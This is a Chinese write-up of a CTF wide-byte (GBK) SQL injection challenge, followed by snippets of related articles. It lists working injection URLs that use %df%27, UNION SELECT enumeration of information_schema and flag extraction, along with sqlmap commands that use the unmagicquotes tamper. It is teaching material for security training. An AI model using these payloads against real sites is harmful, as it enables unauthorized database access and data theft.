南邮nctf-sql injection 3(宽字节注入) 手注+sqlmap
题目地址:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
进入题目后先简单尝试一下。
很明显的宽字节注入。
宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码
关于宽字节注入漏洞具体说明度娘一搜就出来了,这里不再赘述。
手工注入
1、判断列数:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 2%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 3%23
order by 3 时报错,说明只有两列。
2、各类信息:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,(concat_ws(char(32,58,32),user(),database(),version()))%23
sae-chinalover@123.125.23.212 : sae-chinalover : 5.5.52-0ubuntu0.14.04.1
3、库名:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,database()%23
sae-chinalover
4、表名:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,group_concat(table_name)
from information_schema.tables
where table_schema=database()%23
ctf,ctf2,ctf3,ctf4,news
5、ctf4表的列名:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,group_concat(column_name)
from information_schema.columns
where table_name=0x63746634%23
id,flag
这里注意:要将表名ctf4转为16进制
这里提供一个字符串转16进制的网站:
http://www.5ixuexiwang.com/str/hex.php
转了16进制之后记得在前面加上0x
6、flag列的数据:
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,(select flag from ctf4)%23
flag{this_is_sqli_flag}
关于flag的答案
这道题提交的答案各不相同。除了刚刚在ctf4中的flag,在ctf2中还有个nctf的flag。
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27
union select 1,group_concat(id,content) from ctf2%23
nctf{query_in_mysql}
还有一个答案是我在度娘搜到别人提交的,在ctf4,不过我在ctf4已经找不到这个答案了。
nctf{gbk_3sqli}
sqlmap跑法
1、查看有哪些库:
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes --dbs
这个时侯就要用到一个脚本了:
脚本名:unmagicquotes.py
作用:宽字符绕过
2、表名:
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` --tables
3、列名:
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 --columns
4、flag列的数据:
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 -C flag
flag{this_is_sqli_flag}
这就是本题宽字节注入的两种解法。
南邮nctf-sql injection 3(宽字节注入) 手注+sqlmap相关推荐
- mysql宽字节注入_(宽字节注入) 手注+sqlmap
进入题目后先简单尝试一下. 很明显的宽字节注入. 宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码. 手工注入 1.判断列数: http://chinalo ...
- SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...
- sql注入_1-8_宽字节注入
文章目录 一.sql_宽字节注入概念 二.sql_宽字节注入源码分析 三.sql_宽字节注入演示 四.sql_宽字节注入总结 一.sql_宽字节注入概念 1.了解宽字节注入前,必须先了解字符集编码:点 ...
- NCTF之GBK Injection另一种宽字节注入解法
0x00题目: your sql:select id,title from news where id = '1' here is the information 0x01以前的题解是使用%df加上单 ...
- ctf php sql注入,【CTF-Web Learning 1】0x01 SQL注入之宽字节注入
0x01 前言 准备系统梳理和总结提高这一年所学的关于Web方面东西,如有问题欢迎指点. 在计算机中,字符的表示与存储都离不开编码.例如ASCII,utf-8,gbk2312等.通常字符的表示都只需1 ...
- python实现sql宽字节注入+布尔盲注
目录 一.注意点 二.代码 三.使用 1.获取 (简单方法) (复杂方法) 2.使用 四.测试 一.注意点 本文代码是对着pikachu漏洞靶场的宽字节注入关卡开发的,代码中的payload和参数都基 ...
- mysql sql宽字节注入_sql注入之宽字节注入
宽字节注入是因为数据库使用了GBK编码,不过现在大都使用unicode国际编码,大多数网站都使用了utf-8的编码 不过既然是sql注入的一部分,也搭建环境 做做实验 实验环境: wamp集成包 实 ...
- sql注入--宽字节注入
sql注入–宽字节注入 靶场:sqli-labs-master 下载链接:靶场下载链接 第32关 php源码 <?php //including the Mysql connect parame ...
- SQL注入教程——(四)宽字节注入
前言 在mysql中,用于转义(即在字符串中的符号前加上"\")的函数有addslashes,mysql_real_escape_string,mysql_escape_strin ...
最新文章
- OSI第七层:应用层功能及介绍
- SAP CRM get_children 方法里面参数 iv_as_copy 有什么用?
- java的整数扩展,浮点数扩展,字符扩展,转义字符,布尔值扩展
- 美团提出具有「位置编码」的Transformer,性能优于ViT和DeiT
- 设置、获得对话框中 编辑框控件 EDIT 的内容
- Adobe AIR教程:ANE面向IAP的测试和开发
- ubuntu14.04安装V-REP和用户使用手册
- 2.PHP 扩展开始以及内核应用(1) --- PHP 变量在内核中的实现
- 【滤波器】基于matlab脉冲响应不变法+双线性变换法数字滤波器设计【含Matlab源码 884期】
- 【SSDP 协议介绍】
- KEIL 生成 Bin\axf 文件
- Python selenium —— selenium与自动化测试成神之路
- IDEA代码文件导航-Navigate使用技巧
- Wifi热点java_Wifi热点实现文件传输
- 2010年3月份中国物流与采购联合会发布中国制造业采购经理指数为55.1%
- excel 冻结多列窗口
- 【华人学者风采】梁应敞 电子科技大学
- python-yaml文件使用(PyYAML)
- 如何把 Excel 数据按分类拆分为多个
- 【日语】日语单词 ---- 身体部位
热门文章
- DataWhale基础算法第一次作业---线性回归
- TimesTen 应用层数据库缓存学习:16. Aging策略与AWT缓存组
- 怎样将应用程序发布到Apple store上去 (四)
- OpenGL之弧度和角度的换算
- 安装最新版jupyter和anaconda的一个大坑
- 销售技巧:学会这6个方法,没有接近不了的客户!(一)
- python表白图形代码_python表白代码 python皮卡丘编程
- ROS: Publisher and Subscriber
- FPS最精确计算方式
- SSM框架+VUE+Mysql实现的疫苗预约接种管理系统(功能包含分角色,登录/注册、疫苗管理、接种点管理、用户管理、疫苗类型管理、我的预约、预约接种管理、关于等)